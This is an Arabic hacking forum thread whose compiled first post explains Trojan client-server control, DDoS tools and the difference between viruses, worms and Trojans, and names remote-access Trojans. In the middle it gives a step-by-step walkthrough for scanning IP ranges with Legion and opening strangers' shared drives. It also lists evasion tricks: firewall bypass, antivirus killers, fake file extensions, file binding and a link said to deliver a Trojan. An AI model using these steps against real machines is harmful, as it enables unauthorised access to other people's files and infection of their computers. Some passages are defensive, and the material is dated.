    ويعتمد هذا النوع من الهجمات على وضع برنامج خبيث خاص من نوع "حصان طروادة" Trojan Horse في كل كمبيوتر متصل بإنترنت يمكن الوصول إليه عن طريق إرسال البرنامج بواسطة البريد الإلكتروني مثلاً، وتفعيله على هذه الأجهزة لتعمل كأجهزة بث للرزم الشبكية،عند تلقيها الأمر بذلك من برنامج محدد يقبع على جهاز أحد المخترقين. ومن أشهر البرامج المستخدمة في إجراء هذه الهجمات: TRINOO وTribe FloodNet وTFN2K وstacheldraht. ويعتبر هذا النوع من هجمات حجب الخدمة أكثر الأنواع خطورة حيث يمكن أن يشكل خطراً على شبكة الإنترنت كلها وليس على بعض المواقع فقط .
    ميكانيكية الإختراق
    يعتمد الإختراق على السيطرة عن بعد من خلال عاملين مهمين:
    o البرنامج المسيطر ويعرف بالعميل Client.
    o الخادم Server الذي يقوم بتسهيل عملية الإختراق ذاتها .
    وبعبارة أخرى لابد من توفر برنامج على كل من جهازي المخترق والضحية ففي جهاز الضحية يوجد برنامج الخادم وفي جهاز المخترق يوجد برنامج العميل. تختلف طرق إختراق الأجهزة والنظم باختلاف وسائل الإختراق، ولكنها جميعاً تعتمد على فكرة توفر إتصال عن بعد بين جهازي الضحية والذي يزرع به الخادم Server الخاص بالمخترق، وجهاز المخترق على الطرف الأخر حيث يوجد برنامج المستفيد أو العميل Client وهناك ثلاث طرق شائعة لتنفيذ ذلك:
    1- عن طريق ملفات أحصنة طروادة Trojan: ولتحقيق نظرية الإختراق لابد من توفر Software تجسسي يتم إرساله وزرعه من قبل المستفيد في جهاز الضحية ويعرف بالملف اللاصق او الصامت وهو ملف باتش Patch صغير الحجم مهمته الأساسية المبيت بجهاز الضحية (الخادم) وهو حلقة الوصل بينه وبين المخترق (المستفيد).
    o كيفية الإرسال والاستقبال
    تقوم الفكرة هنا على إرسال ملف Patch صغير هذا الملف يعرف باسم حصان طروادة يدخل لجهاز الضحية يغير من هيئته فلو فرضنا بأن إسمه mark.exe وحذرنا منه صديق فإننا سنجده يحمل إسماً آخراً بعد يوم أو يومين. وإن كانت برامج مضادات الفيروسات تعتبرها كذلك فهي بالمقام الأول ملفات تجسس ويمكن أن يسيطر من خلالها المستفيد سيطرة تامة على جهاز الضحية عن بعد وتكمن خطورتها في كونها لا تصدر أية علامات تدل على وجودها بجهاز الخادم.
    o كيفية الإرسال
    تتم عملية إرسال بريمجات التجسس بعدة طرق من أشهرها البريد الإلكتروني حيث يقوم الضحية بفتح المرفقات المرسلة ضمن رسالة غير معروفة المصدر فيجد به برنامج الـ Patch المرسل فيظنه برنامجاً مفيداً فيفتحه أو أنه يفتحه من عامل الفضول ليجده لا يعمل بعد فتحه فيتجاهله معتقداً بأنه معطوب ويهمل الموضوع بينما في ذلك الوقت يكون المخترق قد وضع قدمه الأولى بداخل الجهاز (يقوم بعض الأشخاص بحذف الملف مباشرة عند اكتشافهم بأنه لا يعمل ولكن يكون قد فات الأوان لأن ملف الـ Patch من هذا النوع يعمل فوراً بعد فتحه وإن تم حذفه كما سنرى فيما بعد). وهناك طرق أخرى لزرع أحصنه طروادة غير البريد الإلكتروني كانتقاله عبر المحادثة من خلال برنامج الـ ICQ وكذلك عن طريق إنزال بعض البرامج من أحد المواقع الغير موثوق بها. كذلك يمكن إعادة تكوين حصان طروادة من خلال الماكرو الموجودة ببرامج معالجات النصوص.
    o كيفية الاستقبال
    عند زرع ملف الـ Patch في جهاز الضحية (الخادم) فإنه يقوم مباشرة بالاتجاه إلي ملف تسجيل النظام Registry لأنه يؤدي ثلاثة أمور رئيسية في كل مرة يتم فيها تشغيل الجهاز:
    o فتح بوابة أو منفذ ليتم من خلالها الاتصال.
    o تحديث نفسه وجمع المعلومات المحدثة بجهاز الضحية استعداداً لإرسالها للمخترق فيما بعد.
    o تحديث بيانات المخترق (المستفيد) في الطرف الأخر.
    وتتمثل المهمة الرئيسية لملف الـ Patch فور زرعه مباشرة في فتح منفذ إتصال داخل الجهاز المصاب تمكن برامج المستفيد (برامج الإختراقات) من النفوذ. كما أنه يقوم بعملية التجسس بتسجيل كل ما يحدث بجهاز الضحية أو أنه يقوم بعمل أشياء أخرى حسب ما يطلبه منه المستفيد كتحريك الماوس أو فتح باب محرك الـ CD ROM وكل ذلك يتم عن بعد.
    o بوابات الاتصال Ports
    يتم الاتصال بين الجهازين عبر بوابات ports أو منافذ اتصال وقد يظن البعض بأنها منافذ مادية بإمكانه رؤيتها كمنافذ الطابعة والماوس ولكنها في واقع الأمر جزء من الذاكرة له عنوان معين يتعرف عليه الجهاز بأنه منطقة إتصال يتم عبره إرسال واستقبال البيانات ويمكن استخدام عدد كبير من المنافذ للاتصال وعددها يزيد عن 65000 .
    o التواصل
    قلنا بأن المخترق قد تمكن من وضع قدمه الأولى بداخل جهاز الضحية بعد زرع ملف الـ Patch به ورغم خطورة وجود هذا الملف بجهاز الضحية فإنه يبقى في حالة خمول طالما لم يطلب منه المخترق التحرك فهو مجرد خادم ينفذ ما يصدر له من أوامر ولكن بدونه لا يتمكن المخترق من السيطرة على جهاز الضحية عن بعد، وحتى يتم له ذلك فإن على المخترق بناء حلقة وصل متينة بينه وبين الخادم عن طريق برامج خاصة تعرف ببرامج الإختراق. من جانب آخر تبقى أحصنة طروادة عديمة الفائدة إن لم يتمكن المخترق من التعامل معها وهي تفقد ميزتها الخطرة حالما يتم اكتشافها والتخلص منها كما أوضحنا من قبل. وهناك عامل ممتاز يساهم في تحقيق هذه الميزة فبرامج مضادات الفيروسات الجيدة تكتشف ملفات الـ Patch الحاملة لأحصنة طروادة وتمنعها من الدخول للأجهزة .
    2- عن طريق الـ IP Address : عند اتصالك بالإنترنت تكون معرض لكشف الكثير من المعلومات عنك كعنوان جهازك وموقعه ومزود الخدمة الخاص بك وتسجيل كثير من تحركاتك على الشبكة. ولا تتعجب كثيراً حين تعلم بأن كثيراً من المواقع التي تزورها تفتح سجلاً خاصاً بك يتضمن عنوان الموقع الذي جئت منه IP Address ونوع الكمبيوتر والمتصفح الذي استخدمته بل وحتى نوع معالج جهازك وسرعته ومواصفات شاشاتك وتفاصيل كثيرة. كيف تم معرفة كل ذلك؟ يمكنك التحقق من هذا السؤال لو إنك زرت الموقعين: http://www.privacy.net و http://www.consumer.net . بعد التسجيل اطلب من أحد الموقعين فحص جهازك أثناء اتصالك بالإنترنت وستفاجأ بالنتيجة. مبدئياً عنوانك الخاص بالإنترنت Internet Protocol أو IP يكشف الكثير عنك فكل جهاز متصل بالشبكة يكون له رقم معين خاص به يعرف بإسم الـ IP Address وكل عنوان لموقع على الإنترنت يترجم إلي IP Address الخاص بمزود الخدمة وباختصار يكون الـ IP كرقم هوية خاص بكل من يعمل على الإنترنت. حينما يتمكن مخترق محترف من معرفة رقم الـ IP الخاص بالضحية فإنه من خلاله يتمكن من الدخول إلي الجهاز والسيطرة عليه خلال الفترة التي يكون فيها الضحية متصلاً بالشبكة فقط، ولكن هذا الخيار لا يخدم المخترق كثيراً لأن الـ Server الخاص بمزود الخدمة يقوم بتغيير رقم الـ IP الخاص بالمشترك تلقائياً عند كل عملية دخول للشبكة. يمكنك أن تجرب ذلك بنفسك أثناء اتصالك بالشبكة ومن القائمة Start اختر Run واكتب الأمر التالي في المستطيل الظاهر: winipcfg سيظهر لك عنوان الـ IP اكتبه في ورقة صغيرة واقطع اتصالك. أعد الأتصال مرة اخرى بالشبكة وقم بالإجراء السابق ستجد أن عنوان الـ IP الخاص بك قد تغير.
    3- عن طريق كعكات الإنترنت Internet ****ies
    يمكن أيضاً تحقيق التواصل للاختراق عن طريق كعكات الإنترنت Internet ****ies وهي عبارة عن ملف صغير تضعه بعض المواقع التي يزورها المستخدم على قرصها الصلب. هذا الملف به آليات تمكن الموقع التابع له من خلال جمع وتخزين بعض البيانات عن الجهاز وعدد المرات التي زار المستخدم فيها الموقع كما أنها تسرع عمليات نقل البيانات بين جهاز المستخدم والموقع فالهدف الأساسي منها هو تجاري ولكنه يساء استخدامه من قبل بعض المبرمجين المتمرسين .
    يتم الإختراق بوضع بريمج الخادم بجهاز الضحية ويتم الاتصال به عبر المنفذ port الذي فتحه للمستفيد (المخترق) في الطرف الأخر ولكن حلقة الوصل هذه تنقصها المعابر وهي البرامج المخصصة للاختراق وهذه الأخيرة سنتطرق إليها .
    أخطر برامج الإختراق المتداولة
    أشهر برامج الإختراق المتداولة مرتبة حسب خطورتها هي:
    Net Bus - Back Orifice - Sub Seven - Hack a Tack - Master Paradise Deep Throat - Girl Friend 8- Net Sphere 9- Win Crash 01- Big Cluck - Executer - ICQ Trojan - Back Door.
    __________________________________________________ ___________________

    من هو الهاكرز
    ________________________________________

    من هو الهاكر؟
    في Jargon File يوجد العديد من التعريفات للمصطلح "هاكر"، معظمها يصف خبرة تقنية و سعاده بحل المشكلات و تخطي الحدود. إذا كنت تريد أن تعرف كيف كيف تصبح هاكر هناك تعريفين فقط يجب أن تعرفهما.

    يوجد مجتمع، حضارة مشتركة من المبرمجين المحترفين و خبراء الشبكات بدأت منذ عقود من الزمن منذ ظهور الحواسيب الصغيرة و تجارب ARPAnet المبكرة. أوجد الأشخاص المنتمين لهذا المجتمع المصطلح "هاكر"، الهاكرز هم من بنوا الإنترنت، الهاكرز هم من جعلوا نظام التشغيل يونكس ما هو عليه اليوم، الهاكرز هم من جعلوا الورلد وايد ويب تعمل، إذا كنت منتميا لهذه الحضارة، إذا كنت قد ساهمت بها و يوجد أشخاص آخرون منتمون لها و يعرفونك و يطلقون عليك لقب هاكر إذا فأنت هاكر.

    عقلية الهاكر ليست مقتصرة على حضارة هاكرز البرمجيات فقط. يوجد أشخاص لديهم نفس العقلية و نفس طريقة التفكير في مجالات أخرى مثل الموسيقى و الإلكترونيات. في الحقيقه قد تجد هذه العقلية في أعلى مستويات أي علم أو فن. هاكرز البرمجيات يتعرفون على هذه العقليات في أي مجال آخر و يطلقون على هؤلاء الأشخاص هاكرز أيضاً. و يقول البعض الآخر أن عقلية الهاكر منفصله عن الوسط الذي يعمل به و لكن في بقية هذا المقال سوف نتحدث عن المهارات و الصفات الأساسية لدى هاكر البرمجيات و التقاليد المتعارف عليها في تلك الحضارة التي أطلقت كلمة "هاكر".

    يوجد مجموعة أخرى من الأشخاص يطلقون على أنفسهم لقب هاكرز بكل وقاحة و لكنهم ليسوا كذلك. هؤلاء هم من يشعرون بالسعاده عند إختراق بعض نظم الحاسب أو التصنت على خطوط الهاتف. الهاكرز الحقيقيون يسمون هؤلاء "كراكرز" ولا يودون أن يكون لهم أية علاقه بهم. الهاكرز الحقيقيون يظنون أن الكراكرز غير جديرون بتحمل المسئولية و كسولين و ليسوا على قدرة كبيرة من الخبره. لا تجعلك القدرة على اختراق نظام ما هاكر فإذا استطاع شخص ما سرقة سيارة ما بدون استخدام مفتاحها هل يجعله ذلك مهندس ميكانيكا؟!. للأسف قام بعض الكتاب و الصحفيين باستخدام كلمة "هاكر" ليصفوا الكراكرز و هذا التصرف يسبب الإزعاج الشديد للهاكرز.

    الفرق بسيط و واضح: الهاكرز يقومون بالبناء، الكراكرز يقومون بالهدم.

    إذا كنت تريد أن تصبح هاكر فاستمر بالقراءة. إذا كنت تريد أن تصبح كراكر فاذهب و قم بقراءة أخبار alt.2600 و استعد لقضاء ما بين خمس لعشر سنوات في السجون بعدما تكتشف أنك لست ذكيا كما كنت متصورا. و هذا هو كل ما سأقوله عن الكراكرز.

    رموز تشغيل المودم و تسريعه


    الان أضغط على أيقونة "جهاز الكمبيوتر POROPIRTES

    My Computer >===> POROPIRTES


    MODEM <====< POROPIRTES

    أختر أمر "خصائص

    Properties

    من صفحة "عام

    General

    أختر تكوين

    Configure

    ستظهر لك شاشة جديده أختر منها صفحة أتصال

    Connection

    أضغط على زر "خيارات متقدمه

    Advanced

    سترى حقل خيارات إضافيه

    Extra Settings

    أكتب فيه الرموز
    AT&FX
    أضغط على موافق

    Ok
    ______________________________________

    حزمة برامج ZoneAlarm الجديده....
    ________________________________________

    الاول : ZoneAlarm Securiy Suite 6.0.591 Beta



    التحميـــــــــــــــــــ ــــــل


    الثانى:ZoneAlarm Pro 6.0.591 Beta

    البرنامج ده يا شباب عنده قدرات ممتازه جدا فى ايقاف عمليه الهاك على جهازك وايه كمان بيعمل كمان هاك على اللى بيحاول يعمل عليك انت هاك....ممتـــــــــــــــــ ــــاز
    التحميـــــــــــــــــــ ــــــل

    اختراق بدون باتش....يجب أن يكون على نظامك عميل يسمى . Microsoft Networks
    ________________________________________

    اختراق بدون باتش
    يجب أن يكون على نظامك عميل يسمى . Microsoft Networks

    وطريقة إضافته كالتالي :


    اضغط على زر ابدأ START

    ومن ثم إعدادات . Settings

    ومن ثم لوحة التحكم . Control Panel

    ومن ثم بالنقر على أيقونة شبكات . Networks

    سوف تظهر معك شاشة الاضافه ، اضغط على كلمة عميل . Client

    ستظهر معك شاشة اختيار نوع العميل الذي تريد اضافته ، اضغط على شركة Microsoft ومن ثم اختر العميل Client for Microsoft Networks ومن ثم اضغظ موافق ، بعدها سيطلب منك ادخال قرص الويندوز لتحميل بعض الملفات وبعدها يطلب منك اعادة التشغيل ، اختر لا لكي لا يعيد النظام التشغيل .

    سترجع الى شاشة اعداد الشبكات مرة اخرى ، اضغط على زر مشاركة بالملفات الطابعة .

    ضع صح على كل من :

    اريد أن اكون قادرا على إعطاء الاخرين حق الوصول الى ملفاتي. I want to be able to give others access my files


    اريد أن اكون قادرا على السماح للآخرين بالطباعة على طابعتي .

    I want to be able to allow to others to print on my printers



    · اضغط علىموافق ، وبهدها أغلق اعدادات الشبكة .

    · سترجع الى شاشة لوحة التحكم ، اضغط على ايقونة كلمات المرور ( احمر Passwords )

    · ستظهر معك شاشة كلمات السر ، قم بالتقر على ايقونه Remote Administration .

    · ضع علامه صح على Enable remote administration of this server وبعدها ادخل أي كلمة سرية مرتين ومن ثم موافق . الغرض من هذه الخطوة كي لا يتمكن أحد من الوصول الى ملفاتك وطابعتك الا بالكلمة السرية التي أنت وضعتها





    الان حققت الشرط الازم للاختراق وبقي عليك الطريقة لكي تصل الى ملفات غيرك على الانترنت .



    الطريقة :



    في البداية يجب عليك ان تستخدم برنامج اسمه Legion وهو برنامج مثل برامج الاسكان بورت ويستخدم للبحث في شبكة الانترنت على الأجهزة المفتوحة وعليها خاصية مشاركة الملفات والطابعة .

    تستطيع ان تحمله من هذا الموقع وحجمه 3 ميقابايت :

    http://www.*******club.com/km/files/legion.zip

    بعد تشغيلك للبرنامج سوف يظهر لك قائمتين . القائمة اليسرى يظهر لك أرقام الايبي المصطاده والقائمة اليمنى يعرض لك فيها بيانات كل ايبي وماهي السواقات والطابعات المشاركة وفي الاعلى هناك 4 مربعات فارغة لك تطلب منك ادخال المدى الذي تريد البحث فيه ، على سبيل المثال نريد البحث في المدى 212.64.130.1 . بعد ان تملى المربعات اضغط على زر scan لكي تبدأ البحث .

    سوف يبدأ البرنامج في البحث وسوف يظهر لك ارقام الايبي التي حصل عليها في القائمة اليسرى ، وبعد ان ينتهي من البحث سوف يقوم بفحص كل ايبي حصل عليه لكي يظهر لك ما بداخل كل ايبي من سواقات وطابعات ومشاركة ، وسوف يضعها لك في القائمة اليمنى .

    فلنفرض أنه اصطاد سواقات على احدى ارقام الايبي عندها سيعرض لك البيانات كالمثال التالي :


    Shared resources at //212.64.130.55

    Sharename Type Comment

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ



    ـــــــــــــــــــــــــ ـــــــ

    ATL OPS STUF Disk

    C Disk

    DC ROM Disk

    DC STUFF DISK

    FMPRO Disk

    JW STUFF Disk

    The command was completed successfully .



    اذا ظهرت لك بيانات على أي رقم كالبيانات السابقة انسخ رقم الايبي .

    بعدها اضغط على زر ابدأ . (START)

    اختر تشغيل . (RUN)

    ثم اكتب رقم الايبي

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ



    ـــــــــــــــــــــــــ ــــ

    عندها سوف يفتح لك نافذه كنافذه المستكشف (Explorer) ويضع فيها سواقات الجهاز الذي أنت بداخلة الآن ، اختر أي سواقة تريد .
    منقووووووووول

    الطرق الجديده للهاكرز
    ________________________________________

    ان دراسة اساليب الاختراق والالمام بخدع المخترق
    هي احد الطرق الاكيدة والفعالة والمباشرة للحماية من الاختراق
    وتساوي فى اهميتها تركيب اعظم برامج الحماية
    فلم تعد الطرق التقليدية والتى عرفها المخترق فى الماضي
    تشبع كثيرا رغبتة وطموحه لتحقيق اهدافه المعلنة وغير المعلنة،
    فقد لاحقته وسائل الاعلام بالاساليب المختلفة لتوعيةالمستخدم
    والتحذير من الوقوع فى براثنه وحيله كما طورت برامج الحماية
    بكافة اشكالها لوقف مكايد ودحر خطط المخترق
    ولكن لم يقف المخترق مكتوف الايدي فهناك صراع متزامن
    دائما بين الخير والشر فقام المخترق بتطوير وسائله
    من الخداع والمراوغة لاصطياد فريسته
    ثانيا
    FWB - FireWall Bypasserاختراق الجدران النارية
    تعتبر تلك التقنية بحق من اخطر ماتوصل اليه المخترق فباحد
    اكواد لغة الديلفي البسيطة يندمج التروجان مع تعريف
    الويندوز اكسبلورر وبالتالي يحدث الاتصال بين الهاكرز والتروجان
    تحت مسمع ومراي وترحيب الجدران الناري بل
    وبدون اي استئذان او صلاحية باعتباره صديق عزيز للمستخدم
    تعيب تلك التقنية زيادة حجم التروجان بمقدار 20 ك ولكنها
    فى النهاية تقنية تعادل خطورة بالغة
    ثالثا
    late trojan executionالتنفيذ الموقوت للتروجان
    احد الخدع الحديثة هي برمجة التروجان على التنفيذ فى
    توقيت محدد لاحق للتحميل، فعلي سبيل المثال ارسل لك شخص
    احد البرامج التى لم يكتشفها الانتي فيروس
    وبعد عدة ساعات او ايام او اشهر وحينما تحين ساعة الصفر
    يتم التنفيذ late execution
    تتميز تلك الطريقة بامكانية برمجة التروجان للتنفيذ فى اوقات يتوقع
    عدم عمل الضحية بها لى الانترنت وبالتالي تزيد نسبة اغلاق برنامج
    المراقبة بالانتي فيروس monitoring للحصول على كفاءة
    اكبر للعمل بجهاز الكمبيوتر
    كما يزيل الشك فى الصديق او الشخص او الموقع
    الذي كان السبب الاساسي فى الاصابة
    رابعا
    AV/FW killers
    نظرا لان العديد من المستخدمين يقومون باغلاق خاصية المراقبة
    ببرنامج الانتي فيروس اثناء الابحار بالانترنت او خارجه وذلك
    لتحسين اداء الجهاز عامة او لان الانتي فيروس يعيق السرعة
    ويستهلك الكثير من الذاكرة، فقد استغل المخترق تلك النقطة
    وقام بابتكار برامج قاتلة الانتي فيروس والجدران النارية
    فعند فتح المستخدم للملف اثناء اغلاق موديول المراقبة
    يتم اغلاق كل برامج الحماية قاطبة الى الابد
    وبالتالي حتى بعد اعادة التشغيل قد تظهر الايقونة لبرامج الحماية
    او لاتظهر، طبقا لتصميم التروجان، ولكنها فى النهاية برامج
    حماية مزيفة لاتعمل وبالتاكيد انه لو ترك مويودول المراقبة
    بالانتي فيروس فى حالة عمل لتم اصطياد البرنامج كفيروس
    وانتهى الامر
    سابعا
    notification trojans
    من المؤكد ان احد الطرق التى تعيق عمل المخترق هي
    الحصول على الرقم الفعلي للاي بي للضحية فحتى
    لواصاب الضحية ولم يصل له الرقم فسيكون فى غيبوبة
    عن اختراقه، ولذلك قامت بمهمة محاولة اعاقة وصول رسائل الابلاغ
    للهاكرز مزودات خدمة البريد المجاني ومنها الهوت ميل والياهو
    اذ حجبت وصول رسائل العديد من التروجانات الخطيرة
    بل وتقوم بصورة دورية بتغيير معرفات سيرفراتها stmp
    بهدف حماية المستخدم
    ولكن كان للمخترق مخرج اخر فقد ابتعد تماما عن البريد فى الابلاغ
    واتجه الى احدث تقنيات تصميم المواقع والمفترض استعمالها
    فى التطور التكنولوجي وخير البشرية وعلى سبيل المثال لا الحصر
    php
    cgi ******ing
    net send messages
    irc bot
    icq messenger
    msn messenger
    regular mail on port 25
    كما استخدم المخترق طريقة اخرى هي برامج متخصصة
    تمكن من الحصول على اي بي من هم بقائمة الميسنجر مع المخترق
    غير المحظورين وذلك بدون استقبال ملفات من قبل الضحية
    مستخدما احد الثغرات العميقة باالام اس ان ميسنجر فى
    اصداره السادس
    واخيرا قدمت بعض الشركات الخدمية للبريد تقرير كامل
    للهاكرز عن مستقبل الرسالة شاملا الاي بي الحقيقي
    وتوقيت فتح الرسالة وتاريخها
    وكل ماعلى المخترق هو ارسال رسالة بعنوان شيق للضحية
    وبمجرد فتح الرسالة البريدية سيتم وصول الاي بي للهاكرز
    وبدون ارسال اي رد من المستخدم او دراية بما يحدث فى الكوليس
    وتعتبر الشركات التى تقدم تلك الخدمات، هياكل تجارية كبرى
    وليس الهدف منها خدمة المخترقين
    ولكن دائما للهاكرز راي اخر فى تطويع التكنولوجيا الحديثة
    عاشرا
    extension creator
    مازالت قضية امتداد التروجان احد القضايا التى تشغل بال الهاكرز
    فوعي المستخدم كبير والحذر دائم بعدم فتح الملفات
    ذات الامتدادات التفيذية واهمها
    exe - pif - shs - scr - com - bat
    او الاهتمام بضرورة الكشف عليها قبل التشغيل
    واخيرا قام الهاكرز بدراسة تصميم برامج تقوم بتوليد اي امتداد تنفيذي
    تعتمد تلك البرامج على فكرة ان نظام التشغيل يقوم بتنفيذ
    بعضا من الامتدادات ولايقوم بتنفيذ البعض الاخر
    بناءا على تعريف نظام التشغيل للريجستري بتلك الهيئات
    وعليه فان كل ماسيقوم به البرنامج تعريف الريجستري بجهاز الضحية
    باي امتداد مطلوب من قبل الهاكرز
    وعليه يمكن ان يحدد الهاكرز ان جهاز الضحية
    يمكنه ان يفتح تروجان على الصيغة التالية server.jpeg
    ويتم التنفيذ والاصابة بعيدا عن ادنى شك من الضحية
    الحادي عشر
    binding
    التطور الكبير الحادث فى برامج الربط فاصبح للهاكرز الحرية
    فى تحديد اي مجلد يتم فيه استقرار كل من الملفات المربوطة
    ومكان تنفيذها واسمها بعد التنفيذ وتوقيت تنفيذ كل منها
    بل والاهم ذوال الملف الكبير المربوط الحامل لكل الملفات
    بل واصبحت ملفات الربط تشمل امكانية ربط وتنفيذ كل الهيئات
    jpg- mpeg - wav- gif- dat - psd - txt - doc
    ولن ننسى السهولة الشديدة التى اصبحت لتغيير
    ايقونة الملف الرابط لتكون مشابهة للملف الحميد
    المربوط مزيدا فى الخداع للمستخدم بعد فتح الملف
    الثاني عشر
    expoliting
    استخدم الهاكرز بقوة حداثة انظمة التشغيل (مثل ميكروسوفت
    ويندوز اكس بي) ولم يعبؤا كثيرا بالدعايات التى سبقت
    ... صدور نظام التشغيل الاكثر أمنا ...
    وذلك ليقينهم ان لكل نظام جديد الآف الثغرات التى تمكن
    من القيام بتنفيذ برنامج دون ارسال ملف وفتحه من قبل الضحية
    وهذا مارأيناه قريبا مع فيروس البلاستر
    ومن اشهر استخدامات الثغرات ماتم الهجوم به على
    متصفحات الانترنت اكسبلورر فى اصدارتها 5 - 5.5
    حيث تتم الاصابة بتروجان بمجرد فتح صفحة ويب
    السابع عشر
    تحويل الهاكرز لجهازه الشخصي الى سيرفر
    مما يمكن من تحميل التروجان مباشرة
    من جهازه الى الضحية بدلا من اللجوء
    لتحميله على احد المواقع ولذلك بمجرد ضغط الضحية على
    وصلة ويب نهايتها ملف باسم وهمي وباي امتداد كالتالي
    http://mall.ismailiamall.com/uploadmall/rehab.jpg



    وبمجرد الضغط على الوصلة التى ليس بها ادنى شك انها تحمل


    وراءها تروجانا فسيتم السؤال للضحية عن رغبته فى تحميل ملف
    مع العلم بان كل نظم الويندوز اكس بي التى لم يتم ترقيعها فسيتم تحميل
    وتنفيذ التروجان بجهاز الضحية بدون ان يشعر من خلال 4 ثغرات
    شهيرة بكل من
    mpeg exploiting
    powerpoint exploiting
    quicktime exploiting
    wma exploiting
    midi exploiting
    الثامن عشر
    anonymous emailer
    يمكن للهاكرز استخدام صفحات php لارسال ايميل مجهول المصدر
    شاملا اسم الراسل وايميله مع تزييف رقم الاي بي الخاص به
    نظرا للارسال من المتصفح مباشرة وامكانية استخدام احد البروكسيات
    ومن المعلوم ان تلك البرامج لارسال ايميلات مزيفة
    موجودة منذ القدم ولكن يعيبها اظهار رقم الاي بي للهاكرز
    يظل السؤال مطروحا للنقاش
    هل نحن فى أماان مع شركات الحماية
    هل مازالت اهم الاطروحات التى تشغل بال المستخدم
    هي اي البرامج تفضل
    المكافي - النورتون - البي سي سيليون - الكاسباريسكي
    هل مازلت تنتظر تحذير الجدار الناري بمحاولة اختراقك
    هل مازلت تعتمد فى الحماية على مراجعة قوائم بدأ التشغيل
    وشاشات ادارة المهام والعمليات النشطة
    هل تثق فى ابتسامات البريد المجاني برسائله الرائعة
    NO VIRUS FOUND


    والله الموفق


    منقول للفائدة


    الفرق بين الفيروس و الدودة و التروجان
    ________________________________________

    بسم الله الرحمن الرحيم

    دائما يخلط البعض في المصطلحات فيسمي التروجان والدودة فيروسا. وهذا غير صحيح فالكلمات تروجان وفيروس ودودة هي مصطلحات تطلق على أنواع مختلفة من البرمجيات المؤذية للحاسب.
    وسوف نقوم اليوم بإيضاح الفروقات بين هذه المسميات. فكل نوع له طريقة عمل خاصة به ولذالك أطلقت التسميات المختلفة .

    الفيروس

    الفيروس يلحق نفسه ببرنامج أو ملف وينتشر من جهاز إلى جهاز مثل انتشار مرض الإنسان.

    في كل جهاز يدخله الفيروس يخلف وراءه العدو. خطر الفيروسات يختلف من نوع إلى آخر بعضها قد يؤدي إلى بعض الأعطال البسيطة وبعضها قد يسبب تلف الهاردوير أو البرامج لديك وحتى ملفاتك المهمة.

    في العادة معظم الفيروسات تأتي على شكل ملف تنفيذي exe وهذه الملفات عند نزولها في جهازك لن تعمل حتى تقوم أنت بمحاولة تشغيلها. وللمعلومة الفيروسات لا تنتقل ذاتيا وإنما عن طريق الإنسان وذلك عندما يحاول تشغيلها أو إرسالها عن طريق الإيميل وهو لا يعلم بأنها تحتوي فيروسا.

    ولكي تحمي نفسك من الفيروسات تحتاج إلى برنامج مكافحة الفيروسات وهو يعمل مثل المضاد الحيوي للإنسان فهذا البرنامج يقوم بزيادة مناعة جهازك ضد الفيروسات وبذلك تقل فرص إصابتك بهذه البرمجيات الخبيثة.


    الدودة

    الدودة قريبة من الفيروس في التصميم ولكن تعتبر جزءاً فرعياً من الفيروس. الاختلاف الذي يفرق الفيروس عن الدودة بأن الدودة تنتشر بدون التدخل البشري حيث تنتقل من جهاز إلى آخر بدون عمل أي إجراء.

    الجزء الخبيث في الدودة هو قدرتها على نسخ نفسها في جهازك بعدة أشكال وبذالك يتم إرسالها بدلا من مرة وحدة سترسل آلافاً من النسخ للأجهزة الأخرى. مما يحدث مشاكل كبيرة. وتستغل الدودة طرق الاتصال التي تقوم بها لإتمام هذه العملية لذالك قد ترى في بعض الأحيان ظهور نافذة طلب الاتصال اتوماتيكيا بدون طلبك أنت فانتبه فقد يكون لديك دودة.

    وآثار الدودة عادة هي زيادة في استخدام مصادر الجهاز فيحصل في الجهاز تعليق بسبب قله الرام المتوفر وأيضا تسبب الدودة في توقف عمل الخوادم فعلا سبيل المثال يمكنك تخيل التالي. لو كان عندك دودة فستقوم الدودة بنسخ نفسها ثم إرسال لكل شخص من هم لديك في القائمة البريدية نسخة وإذا فتح احدهم هذه الرسالة ستنتقل إلى كل من لديه هو في قائمته البريدية وهذا يولد انتشاراً واسعاً جداً.

    وأفضل مثال على الدودة هي ما حصل العام الماضي دودة البلاستر التي كانت تدخل لجهازك لتسمع ببعض الأشخاص بالتحكم بجهازك عن بعد . أيضا يقوم برنامج الكاسبرسكاي أعلاه بحمايتك من هذا النوع أيضا.

    التروجان

    التروجان يختلف كليا عن الفيروس والدودة . التروجان صمم لكي يكون مزعجاً أكثر من كونه مؤذياً مثل الفيروسات.

    عندما تقوم بزيارة احد المواقع المشبوهة أحيانا يطلب منك تحميل برنامج معين. الزائر قد ينخدع في ذلك فيعتقد انه برنامج وهو في الحقيقة تروجان .

    يقوم التروجان في بعض الأحيان بمسح بعض الأيقونات على سطح المكتب. مسح بعض ملفات النظام. مسح بعض بياناتك المهمة. تغير الصفحة الرئيسية للإنترنت إكسبلورر. عدم قدرتك على تصفح الانترنت. وأيضا عرف عن التروجانات أنها تقوم بوضع باكدور في جهازك من ما يسمح بنقل بياناتك الخاصة إلى الطرف الآخر بدون علمك.

    وهذا هو الخطير في الأمر. علما بأن التروجان لا يتكاثر مثل الدودة ولا يلحق نفسه ببرنامج مثل الفيروس ولا ينتشر أيضا سواء عن تدخل بشري أو لا، أيضا يقوم الكاسبرسكاي يقوم بحمايتك من هذا النوع أيضاً



  2. #2
    :: مشرف عام :: Aljyyosh Team Array الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    افتراضي رد: تعلم الهاكر ممكن تستفيد منة في المستقبل

    مشكور لاتكفي كرد على هذا الموضوع المميز والرائع فعلا وفقك الله وجزاك الله الف خير وعلينا جميعا أن نجند أنفسنا لخدمة ربنا ونبينا وديننا ...
    تحياتي لك


  3. #3
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2009
    المشاركات
    43

    افتراضي رد: تعلم الهاكر ممكن تستفيد منة في المستقبل

    أخي روابط ليست شغلا للأسف
    لاكن مضوع جميل أحسنت



  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2009
    المشاركات
    43

    افتراضي رد: تعلم الهاكر ممكن تستفيد منة في المستقبل

    ممكن الروابط الصحيحة


  5. #5
    هكر مجتهد Array
    تاريخ التسجيل
    Jan 2010
    الدولة
    صلاله
    المشاركات
    433

    افتراضي رد: تعلم الهاكر ممكن تستفيد منة في المستقبل

    مشكوررررررر


  6. #6
    هكر مجتهد Array الصورة الرمزية هكر مدمر
    تاريخ التسجيل
    Dec 2009
    المشاركات
    218

